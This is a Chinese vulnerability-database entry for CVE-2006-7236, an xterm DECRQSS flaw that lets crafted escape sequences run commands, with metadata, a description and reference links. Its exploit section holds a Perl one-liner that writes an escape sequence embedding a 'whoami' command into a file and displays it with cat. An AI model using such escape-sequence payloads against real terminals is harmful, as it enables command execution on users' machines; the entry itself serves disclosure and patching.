Invisible-Island xterm DECRQSS请求远程命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117148 漏洞类型 配置错误
发布时间 2008-12-29 更新时间 2009-02-26
CVE编号 CVE-2006-7236 CNNVD-ID CNNVD-200901-001
漏洞平台 Linux CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/32690
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-001
|漏洞详情
xterm程序是X窗口系统的终端模拟器,可为无法直接使用窗口系统的程序提供DECVT102与Tektronix4014兼容的终端。DebianGNU/Linuxsid或Ubuntu的xterm的默认配置启用了allowWindowOps资源,这将允许用户辅助的攻击者利用逸出序列运行任意代码或带来其它未指定的影响。
|漏洞EXP
source: http://www.securityfocus.com/bid/33060/info

The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input.

Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application.

The issue affects xterm with patch 237; other versions may also be affected.

The following example is available:

perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
cat bla.log
|参考资料

来源:UBUNTU
名称:USN-703-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-703-1
来源:SECUNIA
名称:33388
链接:http://secunia.com/advisories/33388
来源:bugs.debian.org
链接:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030
来源:bugs.debian.org
链接:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=384593